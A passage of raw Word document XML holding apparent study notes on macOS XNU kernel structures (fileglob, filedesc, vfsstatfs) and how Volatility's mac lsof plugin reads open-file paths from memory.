          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vfs_context_t ctx</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g_ops</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off_t   fg_offset</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void</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76737E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_data</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vnode or socket or SHM or semaphore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void</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_vn_data</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Per fd vnode data, used for directories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lck_mtx_t fg_lock</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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color w:val="008000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_MACF</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sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> label </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_label</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* JMM - use the one in the cred? */</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color w:val="008000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D773A0" w:rsidRPr="007C736F" w:rsidRDefault="00D773A0" w:rsidP="00D773A0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0076052F" w:rsidRPr="0076052F" w:rsidRDefault="007C736F" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Num of </w:t>
      </w:r>
      <w:r w:rsidR="0076052F" w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file proc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C736F" w:rsidRDefault="007C736F" w:rsidP="000A4450"/>
    <w:p w:rsidR="007C736F" w:rsidRDefault="007C736F" w:rsidP="007C736F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filedesc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_lastfile</w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_nfiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C736F" w:rsidRDefault="007C736F" w:rsidP="007C736F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc445313258"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082"/>
    <w:p w:rsidR="00A36082" w:rsidRPr="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\volatility-master\volatility\plugins\mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\lsof.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="00D773A0" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f = fileproc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="00D773A0" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ftype = f.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.fg_type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="00D773A0" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                if ftype == '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DTYPE_VNODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">': </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="00D773A0" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    vnode = f.f_fglob.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.dereference_as("vnode")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="00D773A0" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D773A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    path = vnode.full_path()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc445313259"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mount</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc445313260"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vfsstatfs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="00A36082" w:rsidRDefault="00A36082" w:rsidP="007C736F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\mount.h</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hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vfsstatfs </w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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32_t    f_bsize</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undamental file system block size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size_t      f_iosize</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optimal transfer block size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blocks</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total data blocks in file system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bfree</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ree blocks in fs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bavail</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ree blocks avail to non-superuser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bused</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ree blocks avail to non-superuser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files</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total file nodes in file system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ffree</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ree file nodes in fs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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    fsid_t      f_fsid</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ile system id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d_t       f_owner</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user that mounted the filesystem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64_t    f_flags</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copy of mount exported flags */</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fstypename</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MFSTYPENAMELEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* fs type name inclus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w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_mntonname</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAXPATHLEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* directory on which mounted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w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f_mntfromname</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAXPATHLEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* mounted filesystem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uint32_t    f_fssubtype</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s sub-type (flavor) */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36082" w:rsidRPr="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
